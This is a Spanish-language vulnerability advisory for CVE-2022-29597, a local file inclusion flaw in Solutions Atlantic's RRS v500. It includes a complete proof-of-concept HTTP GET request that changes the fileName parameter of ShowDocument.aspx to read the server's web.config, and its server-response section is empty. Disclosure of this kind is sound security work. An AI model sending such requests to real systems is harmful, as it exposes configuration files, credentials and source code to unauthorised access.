
La aplicación RRS v500 es vulnerable a una vulnerabilidad de Inclusión de Archivos Locales (LFI).
La aplicación RRS v500 de Solutions Atlantic es vulnerable a una vulnerabilidad de Inclusión de Archivos Locales (LFI). Cualquier usuario autenticado tiene la capacidad de hacer referencia a archivos internos del sistema en las solicitudes realizadas a la página /RRSWeb/maint/ShowDocument/ShowDocument.aspx. El servidor responderá exitosamente con el contenido del archivo interno solicitado. Esta capacidad podría permitir a los adversarios extraer datos y/o archivos sensibles del sistema de archivos subyacente, obtener conocimiento sobre el funcionamiento interno del sistema o acceder al código fuente de la aplicación.
URL de Mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29597
URL de NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29597
URL afectada:
/RRSWeb/maint/ShowDocument/ShowDocument.aspxAl abrir o descargar un PDF desde el sitio RRS, se realiza una solicitud a la URL afectada que incluye un parámetro fileName. Este parámetro podría modificarse para incluir una ruta interna del sistema, como web.config. El servidor entonces entregará el archivo solicitado.
Solicitud GET con ruta interna a web.config:
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config HTTP/1.1
Host: <REDACTED>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<REDACTED>/RRSweb/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=<REDACTED>; ASP.NET_SessionId=<REDACTED>
Connection: Keep-Alive
Respuesta del servidor:

Abril 2022